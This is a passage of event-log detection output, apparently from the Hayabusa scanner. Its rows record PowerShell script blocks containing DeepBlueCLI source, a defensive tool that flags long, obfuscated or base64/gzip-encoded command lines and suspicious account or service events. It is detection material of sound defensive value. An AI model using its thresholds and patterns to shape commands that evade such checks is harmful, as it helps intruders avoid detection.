{$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:37.536 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:37.536 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. 
Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:37.536 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. 
# I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:37.539 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. 
$groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. 
$servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ 
$image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:37.545 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it 
exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:37.547 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } 
else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:23:59.512 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? 
"","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:23:59.512 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:23:59.513 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. 
Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:23:59.514 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for 
return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:24:04.587 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:25:39.074 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:25:40.257 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:25:40.262 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline 